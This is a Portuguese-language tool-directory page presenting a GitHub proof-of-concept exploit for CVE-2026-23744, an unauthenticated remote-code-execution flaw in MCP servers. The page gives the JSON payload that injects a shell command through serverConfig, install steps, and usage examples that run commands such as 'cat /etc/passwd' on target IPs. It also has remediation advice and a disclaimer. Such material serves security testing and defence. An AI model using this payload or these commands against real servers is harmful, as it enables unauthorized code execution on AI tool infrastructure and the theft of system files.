Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/d3vn0mi/cve-2026-23744-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubd3vn0mi/cve-2026-23744-poc

CVE-2026-23744-POC

Python PoC para CVE-2026-23744, RCE não autenticado em servidores MCP através do campo de comando serverConfig em /api/mcp/connect (porta padrão 6274)

Ver Repositório
7há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-23744 — RCE Não Autenticado em Servidor MCP

Prova de conceito (PoC) por d3vn0mi

Visão Geral

CVE-2026-23744 é uma vulnerabilidade de Execução Remota de Código (RCE) não autenticada em servidores compatíveis com MCP expostos na porta 6274. O endpoint /api/mcp/connect aceita um objeto serverConfig que permite aos chamadores especificar um comando e argumentos arbitrários do sistema operacional — sem qualquer verificação de autenticação ou autorização.

Um atacante com acesso à rede ao serviço pode executar comandos arbitrários como o utilizador que executa o servidor MCP.

DetalheValor
ID CVECVE-2026-23744
TipoExecução Remota de Código Não Autenticada
EndpointPOST /api/mcp/connect
Porta6274 (padrão)
GravidadeCrítica

Payload Vulnerável

{
  "serverConfig": {
    "command": "sh",
    "args": ["-c", "<COMANDO_DO_ATACANTE>"],
    "env": {}
  },
  "serverId": "qualquer_coisa"
}

O servidor executa o command fornecido com os args indicados sem sanitização ou controlo de acesso.

Instalação

git clone https://github.com/d3vn0mi/CVE-2026-23744-POC.git
cd CVE-2026-23744-POC
pip install -r requirements.txt

Utilização

# Utilização básica
python3 exploit.py -t <IP_ALVO> -c '<COMANDO>'

# Porta personalizada
python3 exploit.py -t 192.168.1.10 -p 6274 -c 'id > /tmp/pwned.txt'

# Ignorar a verificação de alcance
python3 exploit.py -t 10.0.0.5 -c 'whoami' --no-check

# ID de servidor personalizado
python3 exploit.py -t 127.0.0.1 -c 'cat /etc/passwd' -s my_server

Opções

FlagDescrição
-t, --targetIP ou nome de anfitrião do alvo (obrigatório)
-c, --commandComando do sistema operativo a executar (obrigatório)
-p, --portPorta do alvo (padrão: 6274)
-s, --server-idValor de serverId no payload
--timeoutTempo limite da sonda em segundos (padrão: 30)
--no-checkIgnorar a verificação inicial de alcance

Remediação

  • Não exponha o servidor MCP a redes não confiáveis.
  • Aplique os patches do fornecedor assim que estiverem disponíveis.
  • Restrinja o acesso ao endpoint /api/mcp/connect através de autenticação e controlos ao nível da rede.
  • Monitorize a criação de processos inesperados a partir do processo do servidor MCP.

Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas informáticos é ilegal. O autor não assume qualquer responsabilidade por uso indevido. Obtenha sempre autorização adequada antes de testar.

Licença

Este projeto está licenciado sob a Licença MIT.

Autor

d3vn0mi — github.com/d3vn0mi

Baixar ferramenta